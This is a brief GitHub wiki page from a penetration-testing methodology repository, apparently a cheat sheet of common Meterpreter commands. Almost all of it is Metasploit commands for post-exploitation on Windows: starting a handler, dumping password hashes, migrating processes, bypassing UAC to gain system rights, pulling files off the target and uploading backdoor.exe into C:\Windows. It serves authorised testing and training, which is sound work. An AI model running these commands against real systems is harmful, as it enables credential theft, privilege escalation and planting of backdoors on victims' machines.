Common Meterpreter Commands - TheGetch/Penetration-Testing-Methodology GitHub Wiki
Common Meterpreter Commands
https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/
use exploit/multi/handler
session -i #
run post/windows/gather/hashdump
run post/windows/manage/migrate
or
use post/windows/manage/archmigrate
Use with an already achieved meterpreter shell:
use exploit/windows/local/bypassuac
set SESSION <#>
exploit
This can be used to enable the getsystem
command to work (potentially).
meterpreter > download Logs.log /root/
meterpreter > upload /root/backdoor.exe C:\\Windows